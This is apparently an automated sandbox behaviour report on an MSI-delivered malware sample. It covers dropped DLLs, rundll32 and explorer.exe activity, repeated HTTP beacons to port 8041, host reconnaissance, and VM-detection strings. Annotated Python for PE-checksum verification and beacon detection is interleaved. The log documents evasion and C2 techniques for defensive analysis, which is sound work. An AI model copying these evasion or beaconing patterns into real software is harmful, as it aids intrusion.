Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: windows.storage.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: wldp.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: kernel.appcore.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: uxtheme.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: propsys.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: apphelp.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: dlnashext.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: wpdshext.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: profapi.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: edputil.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: urlmon.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: iertutil.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: srvcli.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: netutils.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: sspicli.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: wintypes.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: appresolver.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: bcp47langs.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: slc.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: userenv.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: sppc.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: dsrole.dll
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp, vierm_soft_x64.dll.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
Source: vierm_soft_x64.dll.1.dr Static PE information: real checksum: 0x81152 should be: 0xbc113
Source: vierm_soft_x64.dll.1.dr Static PE information: section name: memcpy_
Source: vierm_soft_x64.dll.1.dr Static PE information: section name: _RDATA
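The checksum finding above (stored 0x81152, expected 0xbc113) means the value in the optional header no longer matches what the loader's CheckSumMappedFile algorithm produces for the file on disk, which is what happens when a binary is patched or packed after linking. The following is an added example, not code from the report or from the sample, of recomputing that value so the check can be repeated on any PE: a ones'-complement sum of the file's 16-bit words with the CheckSum field itself skipped, carries folded, and the file length added. The buffer it is tested against is a constructed minimal MZ/PE header, not vierm_soft_x64.dll, so its expected value (0xA0DD) is that of the constructed buffer.

```python
import struct

# Added example (not code from the report): recompute the PE header CheckSum
# the way CheckSumMappedFile does and compare it with the stored value, which
# is what the "real checksum ... should be" finding above reports.


def _pe_offsets(data: bytes):
    """Return (e_lfanew, offset of OptionalHeader.CheckSum) for a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # CheckSum sits 0x58 bytes past the PE signature for both PE32 and PE32+.
    return e_lfanew, e_lfanew + 0x58


def pe_checksum(data: bytes) -> int:
    """Checksum the image the way the loader does: ones'-complement sum of
    16-bit little-endian words, skipping the CheckSum field, plus the length."""
    _, cs_off = _pe_offsets(data)
    total = 0
    for off in range(0, len(data) - 1, 2):
        if off in (cs_off, cs_off + 2):          # the field being computed
            continue
        total += struct.unpack_from("<H", data, off)[0]
        total = (total & 0xFFFF) + (total >> 16)  # fold the carry
    if len(data) % 2:                             # trailing odd byte
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + len(data)) & 0xFFFFFFFF


def stored_checksum(data: bytes) -> int:
    _, cs_off = _pe_offsets(data)
    return struct.unpack_from("<I", data, cs_off)[0]


def verify_checksum(data: bytes) -> dict:
    """'unset' (0, common for user-mode binaries), 'ok', or 'mismatch'
    (header edited after linking: patched, packed or hand-built)."""
    stored, computed = stored_checksum(data), pe_checksum(data)
    if stored == 0:
        verdict = "unset"
    elif stored == computed:
        verdict = "ok"
    else:
        verdict = "mismatch"
    return {"stored": stored, "computed": computed, "verdict": verdict}


def build_sample(stored: int, size: int = 0x100) -> bytes:
    """Constructed minimal PE-shaped buffer (MZ stub, e_lfanew=0x40, PE
    signature, everything else zero) carrying a chosen CheckSum; not a real DLL."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", buf, 0x40 + 0x58, stored)
    return bytes(buf)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, verify_checksum(fh.read()))
```

A stored value of zero is not evidence of tampering; the linker only fills the field when asked (/RELEASE) and only drivers and boot-time images must carry a valid one. A non-zero value that disagrees with the recomputed one, as in the finding above, is the signal worth a second look.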
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD323C push ecx; ret 4_2_00FD324F
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9900D8 push cs; retf 6_3_000001FF4C9900FD
Source: C:\Windows\explorer.exe Code function: 8_2_0305EF4F push D5912897h; iretq 8_2_0305EF57
Source: C:\Windows\explorer.exe Code function: 8_2_0305F5BA push rcx; ret 8_2_0305F5BC
Source: C:\Windows\explorer.exe Code function: 8_2_0305EE21 push rsi; ret 8_2_0305EE27

Persistence and Installation Behavior

Source: C:\Windows\System32\msiexec.exe Executable created and started: C:\Windows\Installer\MSIF29D.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\vierm_soft_x64.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF29D.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF101.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1BF.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1DF.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF160.tmp

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49903
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49912
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50039
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50052
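The forty-odd lines above are one server port, 8041, being contacted over and over from fresh client ports, which is what cleartext HTTP C2 polling looks like from the wire. Two checks fall out of that: classify the protocol by payload rather than by port and flag HTTP where HTTP is not expected, and look for destinations contacted at near-constant intervals. The following is an added example of both, not code from the report or from any IDS. The flow records are constructed: the server port and client ports echo the pattern above, while the timestamps, the server address and the payload bytes are invented, and the interval threshold is an assumption to tune per environment.

```python
import re
import statistics
from collections import defaultdict

# Added example (not from the report). Constructed flow records of the shape
# (timestamp_s, client_port, server_ip, server_port, first payload bytes).
# The server port and client ports echo the 8041 -> 497xx pattern listed above;
# the timestamps, server address and payloads are invented for the example.
FLOWS = [
    (0.0,   49705, "203.0.113.10", 8041, b"POST / HTTP/1.1\r\nHost: 203.0.113.10:8041\r\n"),
    (60.0,  49706, "203.0.113.10", 8041, b"POST / HTTP/1.1\r\nHost: 203.0.113.10:8041\r\n"),
    (120.0, 49709, "203.0.113.10", 8041, b"POST / HTTP/1.1\r\nHost: 203.0.113.10:8041\r\n"),
    (181.0, 49710, "203.0.113.10", 8041, b"POST / HTTP/1.1\r\nHost: 203.0.113.10:8041\r\n"),
    (240.0, 49723, "203.0.113.10", 8041, b"POST / HTTP/1.1\r\nHost: 203.0.113.10:8041\r\n"),
    (299.0, 49725, "203.0.113.10", 8041, b"POST / HTTP/1.1\r\nHost: 203.0.113.10:8041\r\n"),
    (360.0, 49745, "203.0.113.10", 8041, b"POST / HTTP/1.1\r\nHost: 203.0.113.10:8041\r\n"),
    (420.0, 49751, "203.0.113.10", 8041, b"POST / HTTP/1.1\r\nHost: 203.0.113.10:8041\r\n"),
    # benign controls: ordinary web traffic on 80, and a TLS ClientHello on 443
    (5.0,   49800, "198.51.100.5", 80,   b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n"),
    (700.0, 49901, "198.51.100.5", 80,   b"GET /favicon.ico HTTP/1.1\r\nHost: example.test\r\n"),
    (9.0,   49810, "198.51.100.7", 443,  b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"),
]

HTTP_REQUEST_LINE = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS) \S+ HTTP/1\.[01]\r\n")
EXPECTED_HTTP_PORTS = {80, 8080}        # assumption: adjust to the environment's known proxies


def is_cleartext_http(payload: bytes) -> bool:
    """Classify by content, not by port; that is the whole point of the check."""
    return HTTP_REQUEST_LINE.match(payload) is not None


def http_on_unexpected_port(flows):
    """Flows that speak HTTP to a port where HTTP is not expected."""
    return [(src, dst, port) for _, src, dst, port, payload in flows
            if is_cleartext_http(payload) and port not in EXPECTED_HTTP_PORTS]


def periodic_destinations(flows, min_flows=5, max_cv=0.2):
    """Server endpoints contacted at near-constant intervals (beacon-like).
    cv = stddev / mean of the gaps between contacts; sleep-driven polling keeps
    it small even with some jitter, whereas interactive browsing scatters it."""
    stamps_by_dst = defaultdict(list)
    for ts, _, dst, port, _ in flows:
        stamps_by_dst[(dst, port)].append(ts)
    found = []
    for (dst, port), stamps in stamps_by_dst.items():
        if len(stamps) < min_flows:
            continue
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            found.append({"dst": f"{dst}:{port}", "count": len(stamps),
                          "mean_interval": mean, "cv": round(cv, 3)})
    return found


if __name__ == "__main__":
    for src, dst, port in http_on_unexpected_port(FLOWS):
        print(f"cleartext HTTP on unexpected port: {src} -> {dst}:{port}")
    for beacon in periodic_destinations(FLOWS):
        print("periodic contact:", beacon)
```

The two checks are deliberately independent: an implant that moves to port 80 still trips the interval check, and one that randomises its sleep widely enough to pass the interval check still trips the port check if it keeps using a non-standard port.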
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSIF29D.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo, 6_2_000001FF4CAF4D00
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 8_2_03058424
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 8_2_03057274
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 4125
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 5725
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 8824
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 429
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 881
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 867
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\vierm_soft_x64.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIF101.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIF1BF.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIF1DF.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIF160.tmp
Source: C:\Windows\System32\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Installer\MSIF29D.tmp Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Installer\MSIF29D.tmp API coverage: 6.8 %
Source: C:\Windows\System32\msiexec.exe TID: 3452 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 3396 Thread sleep count: 4125 > 30
Source: C:\Windows\System32\rundll32.exe TID: 3396 Thread sleep time: -247500000s >= -30000s
Source: C:\Windows\System32\rundll32.exe TID: 3396 Thread sleep count: 5725 > 30
Source: C:\Windows\System32\rundll32.exe TID: 3396 Thread sleep time: -343500000s >= -30000s
Source: C:\Windows\explorer.exe TID: 6148 Thread sleep count: 8824 > 30
Source: C:\Windows\explorer.exe TID: 6148 Thread sleep time: -8824000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3924 Thread sleep count: 429 > 30
Source: C:\Windows\explorer.exe TID: 3924 Thread sleep time: -42900s >= -30000s
Source: C:\Windows\explorer.exe TID: 6148 Thread sleep count: 243 > 30
Source: C:\Windows\explorer.exe TID: 6148 Thread sleep time: -243000s >= -30000s
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FEAF79 FindFirstFileExW, 4_2_00FEAF79
Source: C:\Windows\explorer.exe Code function: 8_2_0305A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0305A8E0
Source: C:\Windows\explorer.exe Code function: 8_2_03052B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_03052B28
Source: C:\Windows\explorer.exe Code function: 8_2_030604C0 FindFirstFileW, 8_2_030604C0
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000
Source: explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000008.00000000.2446927908.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: rundll32.exe, 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000008.00000003.3094346841.000000000C8C5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWK
Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: explorer.exe, 00000008.00000002.3333615520.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000008.00000000.2446927908.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000002.3335475832.0000000007693000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CADCCE0 LdrGetProcedureAddress, 6_2_000001FF4CADCCE0
